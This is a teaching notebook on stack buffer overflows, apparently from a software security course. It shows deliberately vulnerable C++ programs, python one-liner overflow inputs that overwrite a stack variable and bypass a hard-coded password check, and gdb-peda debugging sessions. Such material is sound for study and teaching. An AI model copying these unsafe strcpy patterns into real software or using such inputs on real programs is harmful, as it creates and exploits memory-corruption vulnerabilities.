## Stack Overflow

- buffer overrun in the stack segment

## Stack overflow consequences

- stack overflow can violate all 3 CIA (Confidentialy, Integrity and Availability) security principles 

1. overwrite variable(s) with the data of your choice (Integrity)
2. change the flow of the program execution (Integrity)
3. remote code execution (Confidentiality, Integrity, Availability)

- let's look at the first two impact of stack overflow on this notebook

### Memory corruption

- overwrite data in memory
- voilates data integrity
- can overwrite variables with the data of your choice on the stack

- let's use some demo programs to demonstrate various consequences of stackoverflow

In [1]:
! pwd

/home/kali/projects/SoftwareSecurity/notebooks


In [3]:
%cd ../demos/stack_overflow/

/home/kali/projects/SoftwareSecurity/demos/stack_overflow


In [4]:
# let's demonstrate this
! cat memory_corruption.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

int main(int argc, char *argv[]) {
    int num = 5;
    char buffer_one[8], buffer_two[8];

    strcpy(buffer_one, "one"); /* copy "one" into buffer_one */
    strcpy(buffer_two, "two"); /* copy "two" into buffer_two */

    printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[BEFORE] num is at %p and is %d (0x%08x)\n", &num, num, num);

    printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));
    strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

    printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[AFTER] num is at %p and is %d (0x%08x)\n", &num, num, num);
    return 0;
}


In [5]:
%%bash
input="memory_corruption.cpp"
output="memory_corruption.exe"
echo kali | sudo -S ../compile.sh $input $output

[sudo] password for kali: memory_corruption.cpp: In function ‘int main(int, char**)’:
memory_corruption.cpp:16:33: warning: format ‘%p’ expects argument of type ‘void*’, but argument 2 has type ‘int*’ [-Wformat=]
   16 |     printf("[BEFORE] num is at %p and is %d (0x%08x)\n", &num, num, num);
      |                                ~^                        ~~~~
      |                                 |                        |
      |                                 void*                    int*
      |                                %n
memory_corruption.cpp:23:32: warning: format ‘%p’ expects argument of type ‘void*’, but argument 2 has type ‘int*’ [-Wformat=]
   23 |     printf("[AFTER] num is at %p and is %d (0x%08x)\n", &num, num, num);
      |                               ~^                        ~~~~
      |                                |                        |
      |                                void*                    int*
      |                               %n
mem

In [6]:
! ./memory_corruption.exe 
# segfault is bad!! provide some argument
# you don't see segfault in Jupyter notebook, but you can see it in terminal

[BEFORE] buffer_two is at 0xffffbcdc and contains 'two'
[BEFORE] buffer_one is at 0xffffbce4 and contains 'one'
[BEFORE] num is at 0xffffbcec and is 5 (0x00000005)


In [7]:
# run the program providing some argument
! ./memory_corruption.exe hello
# notice the addresses of variables are shifted

[BEFORE] buffer_two is at 0xffffbcdc and contains 'two'
[BEFORE] buffer_one is at 0xffffbce4 and contains 'one'
[BEFORE] num is at 0xffffbcec and is 5 (0x00000005)

[STRCPY] copying 5 bytes into buffer_two

[AFTER] buffer_two is at 0xffffbcdc and contains 'hello'
[AFTER] buffer_one is at 0xffffbce4 and contains 'one'
[AFTER] num is at 0xffffbcec and is 5 (0x00000005)


In [8]:
# try a few some other values like 15 As
! ./memory_corruption.exe $(python3 -c 'print("A"*15)')
# observe the values of buffer_two and buffer_one, and num

[BEFORE] buffer_two is at 0xffffbccc and contains 'two'
[BEFORE] buffer_one is at 0xffffbcd4 and contains 'one'
[BEFORE] num is at 0xffffbcdc and is 5 (0x00000005)

[STRCPY] copying 15 bytes into buffer_two

[AFTER] buffer_two is at 0xffffbccc and contains 'AAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffbcd4 and contains 'AAAAAAA'
[AFTER] num is at 0xffffbcdc and is 5 (0x00000005)


In [9]:
# try 16 As
! ./memory_corruption.exe  $(python3 -c 'print("A"*16, end="")')
# observe the values of buffer_two and buffer_one, and num
# num is 0 which is ascii value of NULL

[BEFORE] buffer_two is at 0xffffbccc and contains 'two'
[BEFORE] buffer_one is at 0xffffbcd4 and contains 'one'
[BEFORE] num is at 0xffffbcdc and is 5 (0x00000005)

[STRCPY] copying 16 bytes into buffer_two

[AFTER] buffer_two is at 0xffffbccc and contains 'AAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffbcd4 and contains 'AAAAAAAA'
[AFTER] num is at 0xffffbcdc and is 0 (0x00000000)


- try to overwrite num variable with "BCDE"
- how may bytes is num away from buffer_two? What's the offset of buffer_two with respect to num?
- find the difference between the address of value and buffer_two

In [10]:
# subtract the address of buffer_two from the address of num
# which variable is at higher location?
print(0xffffc414 - 0xffffc40c)

8


In [11]:
# we know that 16 byes is the offset! any longer text will modify the num variable
# try 16As+"BCDE" and notice the value of num
! ./memory_corruption.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')

[BEFORE] buffer_two is at 0xffffbccc and contains 'two'
[BEFORE] buffer_one is at 0xffffbcd4 and contains 'one'
[BEFORE] num is at 0xffffbcdc and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffbccc and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffbcd4 and contains 'AAAAAAAABCDE'
[AFTER] num is at 0xffffbcdc and is 1162101570 (0x45444342)


In [12]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

'B'

In [13]:
# or find the hex representation of ASCII of B
ord('B')

66

In [14]:
# let's check that 0x45444342 is hex representation of 'BCDE' in reverse order
print(''.join(["{:02x}".format(ord(c)) for c in 'BCDE']))

42434445


### Recall x86 stores integers in little-endian!

In [15]:
# now try overwriting value with BCDE; in the right order
! ./memory_corruption.exe $(python3 -c 'print("A"*16 + "EDCB")')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., least significant byte is stored first

[BEFORE] buffer_two is at 0xffffbccc and contains 'two'
[BEFORE] buffer_one is at 0xffffbcd4 and contains 'one'
[BEFORE] num is at 0xffffbcdc and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffbccc and contains 'AAAAAAAAAAAAAAAAEDCB'
[AFTER] buffer_one is at 0xffffbcd4 and contains 'AAAAAAAAEDCB'
[AFTER] num is at 0xffffbcdc and is 1111704645 (0x42434445)


In [16]:
# can directly send hex values of EDCB
! ./memory_corruption.exe  $(python3 -c 'print("A"*16 + "\x45\x44\x43\x42")')

[BEFORE] buffer_two is at 0xffffbccc and contains 'two'
[BEFORE] buffer_one is at 0xffffbcd4 and contains 'one'
[BEFORE] num is at 0xffffbcdc and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffbccc and contains 'AAAAAAAAAAAAAAAAEDCB'
[AFTER] buffer_one is at 0xffffbcd4 and contains 'AAAAAAAAEDCB'
[AFTER] num is at 0xffffbcdc and is 1111704645 (0x42434445)


In [17]:
! ./memory_corruption.exe $(python3 -c 'print("A"*110000 + "\x1c\xc3\xff\xff")')

[BEFORE] buffer_two is at 0xfffe0f2c and contains 'two'
[BEFORE] buffer_one is at 0xfffe0f34 and contains 'one'
[BEFORE] num is at 0xfffe0f3c and is 5 (0x00000005)

[STRCPY] copying 110007 bytes into buffer_two

[AFTER] buffer_two is at 0xfffe0f2c and contains '...Ãÿÿ'


[AFTER] buffer_one is at 0xfffe0f34 and contains '...Ãÿÿ'
[AFTER] num is at 0xfffe0f3c and is 1094795585 (0x41414141)


### draw stack of main( ) and answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- what caused the memory corruption?
- compile and run the program with some arguments

### Change the flow of the program execution
- due to buffer overflow, we can change the flow of the program execution especially if the program relies on the variable data on the stack
- violates the integriy of the program itself
- use `demos/stack_overflow/authenticate.cpp` program to demonstrate the impact

In [18]:
! cat authenticate.cpp

#include <cstring>
#include <iostream>
#include <cstdlib>

using namespace std;

int check_authentication(char *password) {
    int auth_flag = 0;
    char password_buffer[16];

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [29]:
%%bash
# let's compile the program
input="authenticate.cpp"
output="authenticate.exe"
#echo kali | sudo -S ../compile.sh $input $output
g++ -m32 -g -o $output $input

In [30]:
# run the program; gives help on how to run it properly
! ./authenticate.exe

Usage: ./authenticate.exe password


In [31]:
# authenticate with hard-coded password: outgrabe
! ./authenticate.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [22]:
# authenticate with hardcoded password: brillig
! ./authenticate.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [23]:
# any other password shouldn't work!
! ./authenticate.exe ardasdf


Access Denied.


### authenticate without correct password

In [24]:
# since password_buffer is 16 bytes, let's provide 16 As as password
! ./authenticate.exe $(python -c 'print("A"*16)')


Access Denied.


In [25]:
# how about 17 As?
! ./authenticate.exe $(python -c 'print("A"*17)')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### TODO
- draw stack of check_authentication( ) 
- explain why 17As lets you in!

### verify with gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context
- observe the value of auth_flag; any int value other than 0 is treated as true!
- make sure peda (python exploit development assistante) is installed (see [GDB Peda Notebook](./GDB-Peda.ipynb)

- load authenticate.exe into gdb

```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/stack_overflow]
└─$ gdb -q authenticate.exe
Reading symbols from authenticate.exe...
```

- set a break point at check_authentication function
```bash
gdb-peda$ break check_authentication
Breakpoint 1 at 0x80491c4: file demos/stack_overflow/authenticate.cpp, line 7.
```

- run the program with 17 A's as argument

```bash
gdb-peda$ run $(python3 -c 'print("A"*17)')
Starting program: /home/kali/EthicalHacking/authenticate.exe $(python3 -c 'print("A"*17)')
[----------------------------------registers-----------------------------------]
EAX: 0xffffc6d0 ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc3b0 --> 0x2 
EDX: 0xffffc3e4 --> 0x0 
ESI: 0xffffc3b0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc368 --> 0xffffc398 --> 0x0 
ESP: 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491c4 (<_Z20check_authenticationPc+18>:        mov    DWORD PTR [ebp-0xc],0x0)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491b6 <_Z20check_authenticationPc+4>:    sub    esp,0x24
   0x80491b9 <_Z20check_authenticationPc+7>:    call   0x80490f0 <__x86.get_pc_thunk.bx>                             
   0x80491be <_Z20check_authenticationPc+12>:   add    ebx,0x2e42                                                    
=> 0x80491c4 <_Z20check_authenticationPc+18>:   mov    DWORD PTR [ebp-0xc],0x0                                       
   0x80491cb <_Z20check_authenticationPc+25>:   sub    esp,0x8                                                       
   0x80491ce <_Z20check_authenticationPc+28>:   push   DWORD PTR [ebp+0x8]                                           
   0x80491d1 <_Z20check_authenticationPc+31>:   lea    eax,[ebp-0x1c]                                                
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax                                                           
[------------------------------------stack-------------------------------------]                                     
0000| 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc344 --> 0x804c031 --> 0x0 
0008| 0xffffc348 --> 0x804c02c --> 0x0 
0012| 0xffffc34c --> 0x8049333 (<__static_initialization_and_destruction_0(int, int)+12>:       add    ebx,0x2ccd)
0016| 0xffffc350 --> 0x0 
0020| 0xffffc354 --> 0x2 
0024| 0xffffc358 --> 0xffffc378 --> 0x804c000 --> 0x804bf04 --> 0x1 
0028| 0xffffc35c --> 0x804939f (<_GLOBAL__sub_I__Z20check_authenticationPc()+31>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, check_authentication (password=0xffffc6d0 'A' <repeats 17 times>)
    at demos/stack_overflow/authenticate.cpp:7
7           int auth_flag = 0;
```

- step through the code and stop after strcpy(password_buffer, password);
- entering next command twice will do it

```bash
gdb-peda$ n

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffc34c ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc6e0 --> 0x4f430041 ('A')
EDX: 0xffffc35c --> 0x41 ('A')
ESI: 0xffffc3b0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc368 --> 0xffffc398 --> 0x0 
ESP: 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491dd (<_Z20check_authenticationPc+43>:        sub    esp,0x8)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax
   0x80491d5 <_Z20check_authenticationPc+35>:   call   0x8049090 <strcpy@plt>
   0x80491da <_Z20check_authenticationPc+40>:   add    esp,0x10
=> 0x80491dd <_Z20check_authenticationPc+43>:   sub    esp,0x8
   0x80491e0 <_Z20check_authenticationPc+46>:   lea    eax,[ebx-0x1ff7]
   0x80491e6 <_Z20check_authenticationPc+52>:   push   eax
   0x80491e7 <_Z20check_authenticationPc+53>:   lea    eax,[ebp-0x1c]
   0x80491ea <_Z20check_authenticationPc+56>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc344 --> 0x804c031 --> 0x0 
0008| 0xffffc348 --> 0x804c02c --> 0x0 
0012| 0xffffc34c ('A' <repeats 17 times>)
0016| 0xffffc350 ('A' <repeats 13 times>)
0020| 0xffffc354 ("AAAAAAAAA")
0024| 0xffffc358 ("AAAAA")
0028| 0xffffc35c --> 0x41 ('A')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
12          if(strcmp(password_buffer, "brillig") == 0)
```

- now the password is copeid to password_buffer, let's see the values of couple of stack variables

```bash
gdb-peda$ p/s password_buffer 
$1 = 'A' <repeats 16 times>

gdb-peda$ p/d auth_flag
$2 = 65
```

- why was auth_flag overwritten?
- let's print the addresses of these variables to answer it

```bash
gdb-peda$ p &password_buffer 
$3 = (char (*)[16]) 0xffffc34c

gdb-peda$ p &auth_flag
$4 = (int *) 0xffffc35c
```

- address of auth_flag is at a higher address compared to the address of password_buffer
- let's subtract the the address of password_buffer from auth_flag to find the difference; positive means the auth_flag is at larger address

In [26]:
print(0xffffc35c - 0xffffc34c)

16


In [36]:
! gdb -q -batch -x authenticate_gdb.txt ./authenticate.exe

+break check_authentication
Breakpoint 1 at 0x11cf: file authenticate.cpp, line 8.
+run $(python3 -c 'print("A"*17)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
++peda context
Use 'set logging enabled off'.

+++set logging off
+++set height 0
+++set logging file /tmp/peda-3467llm4
+++set logging overwrite on
+++set logging redirect on
Use 'set logging enabled on'.

+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-ptg2wjwk
+++set logging overwrite on
+++set logging redirect on
+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-p9ib17s0
+++set logging overwrite on
+++set logging redirect on
+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-fq9k0_91
+++set logging overwrite on
+++set logging redirect on
+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-hl7fthdw
+++set logging overwr

### variables declaration order

- can you still overflow if the variable declaration orders are switched?
- normally, variables are pushed on the stack as they're loaded from top to bottom
    - the last variable decalred will be pushed last on the top of the stack

### TODO

- let's look at an example program demos/stack_overflow/authenticate2.cpp

- draw stack
- verify it using GDB

In [37]:
! cat authenticate2.cpp

#include <cstring>
#include <iostream>
#include <cstdlib>

using namespace std;

bool check_authentication(char *password) {
    char password_buffer[16];
    bool auth_flag = false;

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = true;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = true;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [38]:
%%bash
# let's compile the program
input="authenticate2.cpp"
output="authenticate2.exe"
echo kali | sudo -S ../compile.sh $input $output

[sudo] password for kali: 

In [39]:
# run the program with 17As
! ./authenticate2.exe $(python3 -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### How is it possible?

- see in gdb where `auth_flag` is relative to `password_buffer`
- auth_flag must be still at higher address (pushed before) compared to password_buffer
- one plausible explanation is compiler optimization
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer
    - however, you can still overwrite other part of the memory including caller's return address
    - great, let's keep going... :)

In [40]:
! gdb -q -x authenticate2_gdb.txt ./authenticate2.exe

Reading symbols from ./authenticate2.exe...
+break check_authentication
Breakpoint 1 at 0x80491a8: file authenticate2.cpp, line 9.
+run $(python3 -c 'print("A"*17)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
++peda context
Use 'set logging enabled off'.

+++set logging off
+++set height 0
+++set logging file /tmp/peda-35ckbjm0
+++set logging overwrite on
+++set logging redirect on
Use 'set logging enabled on'.

+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-suwhzp0t
+++set logging overwrite on
+++set logging redirect on
+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-x0avoogv
+++set logging overwrite on
+++set logging redirect on
+++set logging on
+++set logging off
+++set height 0
+++set logging file /tmp/peda-_h9eqrm8
+++set logging overwrite on
+++set logging redirect on
+++set logging on
+++set logging off
+++set height 0
+++set loggi